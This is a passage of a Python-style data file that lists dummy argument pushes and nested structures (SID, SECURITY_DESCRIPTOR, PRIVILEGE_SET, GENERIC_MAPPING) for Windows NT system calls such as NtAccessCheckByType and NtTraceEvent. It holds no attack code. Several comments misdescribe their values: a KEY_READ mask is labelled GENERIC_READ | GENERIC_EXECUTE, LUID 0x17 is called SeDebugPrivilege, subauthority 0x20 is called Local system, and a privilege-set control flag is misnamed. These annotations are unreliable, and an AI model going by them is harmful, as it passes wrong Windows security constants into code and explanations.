\"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (no flags)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"AUDIT_EVENT_TYPE AuditType (ObjectAccess)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00120089\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (e.g., READ_CONTROL | WRITE_DAC)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to SID PrincipalSelfSid (dummy pointer)\",\r\n \"structurePointer\": \"SID\",\r\n \"structureRef\": \"struct4\",\r\n \"structureValueExpectations\": \"SID structure for principal.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR (dummy pointer)\",\r\n \"structurePointer\": \"SECURITY_DESCRIPTOR\",\r\n \"structureRef\": \"struct5\",\r\n \"structureValueExpectations\": \"Security descriptor for object.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING ObjectName (None, no name)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PUNICODE_STRING ObjectTypeName (None, no type name)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"PVOID HandleId (None, not used)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING SubsystemName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct6\",\r\n \"structureValueExpectations\": \"Name of the subsystem.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct2\": {\r\n \"type\": \"GENERIC_MAPPING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GenericRead\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x80000000\",\r\n \"fieldComment\": \"GENERIC_READ\"\r\n },\r\n {\r\n \"fieldName\": \"GenericWrite\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x40000000\",\r\n \"fieldComment\": \"GENERIC_WRITE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericExecute\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x20000000\",\r\n \"fieldComment\": \"GENERIC_EXECUTE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericAll\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x10000000\",\r\n \"fieldComment\": \"GENERIC_ALL\"\r\n }\r\n ]\r\n },\r\n \"struct3\": {\r\n \"type\": \"OBJECT_TYPE_LIST\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Level\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Top-level object\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectType\",\r\n \"fieldType\": \"GUID*\",\r\n \"fieldValue\": \"0xbadd00c0\",\r\n \"fieldComment\": \"Pointer to object type GUID (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct4\": {\r\n \"type\": \"SID\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"SID revision\"\r\n },\r\n {\r\n \"fieldName\": \"SubAuthorityCount\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"One subauthority\"\r\n },\r\n {\r\n \"fieldName\": \"IdentifierAuthority\",\r\n \"fieldType\": \"BYTE[6]\",\r\n \"fieldValue\": \"0x000000000005\",\r\n \"fieldComment\": \"NT Authority\"\r\n },\r\n {\r\n \"fieldName\": \"SubAuthority[0]\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000020\",\r\n \"fieldComment\": \"Local system\"\r\n }\r\n ]\r\n },\r\n \"struct5\": {\r\n \"type\": \"SECURITY_DESCRIPTOR\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"Revision\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz1\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"SECURITY_DESCRIPTOR_CONTROL\",\r\n \"fieldValue\": \"0x8004\",\r\n \"fieldComment\": \"SE_DACL_PRESENT | SE_SELF_RELATIVE\"\r\n },\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd00d0\",\r\n \"fieldComment\": \"Pointer to owner SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd00e0\",\r\n \"fieldComment\": \"Pointer to group SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Sacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Dacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0xbadd00f0\",\r\n \"fieldComment\": \"Pointer to DACL (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct6\": {\r\n \"type\": \"UNICODE_STRING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0014\",\r\n \"fieldComment\": \"20 bytes (10 UTF-16 chars)\"\r\n },\r\n {\r\n \"fieldName\": \"MaximumLength\",\r\n \"fieldType\": \"USHORT\",\r\n \"fieldValue\": \"0x0020\",\r\n \"fieldComment\": \"32 bytes\"\r\n },\r\n {\r\n \"fieldName\": \"Buffer\",\r\n \"fieldType\": \"PWSTR\",\r\n \"fieldValue\": \"0xbadd0100\",\r\n \"fieldComment\": \"Pointer to subsystem name string (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtTraceEvent\": {\r\n \"ntFunc\": \"NtTraceEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to event fields buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"ULONG FieldSize (32 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG Flags (e.g., TRACE_EVENT_FLAG_CRITICAL)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000abcd\",\r\n \"additionalComment\": \"HANDLE TraceHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtPowerInformation\": {\r\n \"ntFunc\": \"NtPowerInformation\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG OutputBufferLength (typical small buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to OutputBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000008\",\r\n \"additionalComment\": \"ULONG InputBufferLength (typical small input buffer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to InputBuffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x0000000c\",\r\n \"additionalComment\": \"POWER_INFORMATION_LEVEL InformationLevel (SystemPowerInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtAccessCheckByType\": {\r\n \"ntFunc\": \"NtAccessCheckByType\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to NTSTATUS ReturnStatus (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to ACCESS_MASK GrantedAccess (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to ULONG PrivilegeSetLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to PRIVILEGE_SET (dummy pointer)\",\r\n \"structurePointer\": \"PRIVILEGE_SET\",\r\n \"structureRef\": \"struct7\",\r\n \"structureValueExpectations\": \"PrivilegeCount, Control, array of LUID_AND_ATTRIBUTES.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to GENERIC_MAPPING (dummy pointer)\",\r\n \"structurePointer\": \"GENERIC_MAPPING\",\r\n \"structureRef\": \"struct8\",\r\n \"structureValueExpectations\": \"GenericRead, GenericWrite, GenericExecute, GenericAll masks.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG ObjectTypeListLength (single object type)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to OBJECT_TYPE_LIST (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_TYPE_LIST\",\r\n \"structureRef\": \"struct9\",\r\n \"structureValueExpectations\": \"Level, Sbz, Type pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_EXECUTE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ClientToken (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to SID PrincipalSelfSid (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x01020300\"\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR (dummy pointer)\",\r\n \"structurePointer\": \"SECURITY_DESCRIPTOR\",\r\n \"structureRef\": \"struct10\",\r\n \"structureValueExpectations\": \"Revision, Control, Owner, Group, SACL, DACL.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct7\": {\r\n \"type\": \"PRIVILEGE_SET\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"PrivilegeCount\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"One privilege in set\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Luid.LowPart\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000017\",\r\n \"fieldComment\": \"LUID for SeDebugPrivilege\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Luid.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part of LUID\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Attributes\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n }\r\n ]\r\n },\r\n \"struct8\": {\r\n \"type\": \"GENERIC_MAPPING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GenericRead\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x80000000\",\r\n \"fieldComment\": \"GENERIC_READ\"\r\n },\r\n {\r\n \"fieldName\": \"GenericWrite\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x40000000\",\r\n \"fieldComment\": \"GENERIC_WRITE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericExecute\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x20000000\",\r\n \"fieldComment\": \"GENERIC_EXECUTE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericAll\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x10000000\",\r\n \"fieldComment\": \"GENERIC_ALL\"\r\n }\r\n ]\r\n },\r\n \"struct9\": {\r\n \"type\": \"OBJECT_TYPE_LIST\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Level\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Object type level\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"POINTER\",\r\n \"fieldValue\": \"0xbadd0300\",\r\n \"fieldComment\": \"Pointer to object type GUID (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct10\": {\r\n \"type\": \"SECURITY_DESCRIPTOR\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"SECURITY_DESCRIPTOR_REVISION\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz1\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x8004\",\r\n \"fieldComment\": \"SE_DACL_PRESENT | SE_SELF_RELATIVE\"\r\n },\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0310\",\r\n \"fieldComment\": \"Pointer to owner SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0320\",\r\n \"fieldComment\": \"Pointer to group SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Sacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Dacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0xbadd0330\",\r\n \"fieldComment\": \"Pointer to DACL (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAccessCheckByTypeResultList\": {\r\n \"ntFunc\": \"NtAccessCheckByTypeResultList\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to NTSTATUS ReturnStatus (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to ACCESS_MASK GrantedAccess (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to ULONG PrivilegeSetLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to PRIVILEGE_SET (dummy pointer)\",\r\n \"structurePointer\": \"PRIVILEGE_SET\",\r\n \"structureRef\": \"struct7\",\r\n \"structureValueExpectations\": \"PrivilegeCount, Control, array of LUID_AND_ATTRIBUTES.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to GENERIC_MAPPING (dummy pointer)\",\r\n \"structurePointer\": \"GENERIC_MAPPING\",\r\n \"structureRef\": \"struct8\",\r\n \"structureValueExpectations\": \"GenericRead, GenericWrite, GenericExecute, GenericAll masks.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG ObjectTypeListLength (single object type)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00f0\",\r\n \"additionalComment\": \"Pointer to OBJECT_TYPE_LIST (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_TYPE_LIST\",\r\n \"structureRef\": \"struct9\",\r\n \"structureValueExpectations\": \"Level, Sbz, Type pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_EXECUTE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ClientToken (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0100\",\r\n \"additionalComment\": \"Pointer to SID PrincipalSelfSid (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x01020300\"\r\n },\r\n {\r\n \"value\": \"0xbadd0110\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR (dummy pointer)\",\r\n \"structurePointer\": \"SECURITY_DESCRIPTOR\",\r\n \"structureRef\": \"struct10\",\r\n \"structureValueExpectations\": \"Revision, Control, Owner, Group, SACL, DACL.\",\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct7\": {\r\n \"type\": \"PRIVILEGE_SET\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"PrivilegeCount\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"One privilege in set\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Luid.LowPart\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000017\",\r\n \"fieldComment\": \"LUID for SeDebugPrivilege\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Luid.HighPart\",\r\n \"fieldType\": \"LONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"High part of LUID\"\r\n },\r\n {\r\n \"fieldName\": \"Privilege[0].Attributes\",\r\n \"fieldType\": \"DWORD\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"SE_PRIVILEGE_ENABLED\"\r\n }\r\n ]\r\n },\r\n \"struct8\": {\r\n \"type\": \"GENERIC_MAPPING\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"GenericRead\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x80000000\",\r\n \"fieldComment\": \"GENERIC_READ\"\r\n },\r\n {\r\n \"fieldName\": \"GenericWrite\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x40000000\",\r\n \"fieldComment\": \"GENERIC_WRITE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericExecute\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x20000000\",\r\n \"fieldComment\": \"GENERIC_EXECUTE\"\r\n },\r\n {\r\n \"fieldName\": \"GenericAll\",\r\n \"fieldType\": \"ACCESS_MASK\",\r\n \"fieldValue\": \"0x10000000\",\r\n \"fieldComment\": \"GENERIC_ALL\"\r\n }\r\n ]\r\n },\r\n \"struct9\": {\r\n \"type\": \"OBJECT_TYPE_LIST\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Level\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0001\",\r\n \"fieldComment\": \"Object type level\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x0000\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"POINTER\",\r\n \"fieldValue\": \"0xbadd0300\",\r\n \"fieldComment\": \"Pointer to object type GUID (dummy pointer)\"\r\n }\r\n ]\r\n },\r\n \"struct10\": {\r\n \"type\": \"SECURITY_DESCRIPTOR\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Revision\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x01\",\r\n \"fieldComment\": \"SECURITY_DESCRIPTOR_REVISION\"\r\n },\r\n {\r\n \"fieldName\": \"Sbz1\",\r\n \"fieldType\": \"BYTE\",\r\n \"fieldValue\": \"0x00\",\r\n \"fieldComment\": \"Reserved\"\r\n },\r\n {\r\n \"fieldName\": \"Control\",\r\n \"fieldType\": \"WORD\",\r\n \"fieldValue\": \"0x8004\",\r\n \"fieldComment\": \"SE_DACL_PRESENT | SE_SELF_RELATIVE\"\r\n },\r\n {\r\n \"fieldName\": \"Owner\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0310\",\r\n \"fieldComment\": \"Pointer to owner SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Group\",\r\n \"fieldType\": \"PSID\",\r\n \"fieldValue\": \"0xbadd0320\",\r\n \"fieldComment\": \"Pointer to group SID (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Sacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"Dacl\",\r\n \"fieldType\": \"PACL\",\r\n \"fieldValue\": \"0xbadd0330\",\r\n \"fieldComment\": \"Pointer to DACL (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtAccessCheckByTypeResultListAndAuditAlarm\": {\r\n \"ntFunc\": \"NtAccessCheckByTypeResultListAndAuditAlarm\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0120\",\r\n \"additionalComment\": \"Pointer to BOOLEAN GenerateOnClose (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00\"\r\n },\r\n {\r\n \"value\": \"0xbadd0130\",\r\n \"additionalComment\": \"Pointer to NTSTATUS ReturnStatus (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0140\",\r\n \"additionalComment\": \"Pointer to ACCESS_MASK GrantedAccess (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00\",\r\n \"additionalComment\": \"BOOLEAN ObjectCreation (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0150\",\r\n \"additionalComment\": \"Pointer to GENERIC_MAPPING (dummy pointer)\",\r\n \"structurePointer\": \"GENERIC_MAPPING\",\r\n \"structureRef\": \"struct8\",\r\n \"structureValueExpectations\": \"GenericRead, GenericWrite, GenericExecute, GenericAll masks.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ULONG ObjectTypeListLength (single object type)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0160\",\r\n \"additionalComment\": \"Pointer to OBJECT_TYPE_LIST (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_TYPE_LIST\",\r\n \"structureRef\": \"struct9\",\r\n \"structureValueExpectations\": \"Level, Sbz, Type pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ULONG Flags (no flags set)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"AUDIT_EVENT_TYPE AuditType (ObjectAccess)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020019\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_EXECUTE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0170\",\r\n \"additionalComment\": \"Pointer to SID PrincipalSelfSid (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x01020300\"\r\n },\r\n {\r\n \"value\": \"0xbadd0180\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR (dummy pointer)\",\r\n \"structurePointer\": \"SECURITY_DESCRIPTOR\",\r\n \"structureRef\": \"struct10\",\r\n \"structureValueExpectations\": \"Revision, Control, Owner, Group, SACL, DACL.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0190\",\r\n \"additionalComment\": \"Pointer to UNICODE_STRING ObjectName (dummy pointer)\",\r\n \"structurePointer\": \"UNICODE_STRING\",\r\n \"structureRef\": \"struct11\",\r\n \"structureValueExpectations\": \"Length, MaximumLength, Buffer pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": 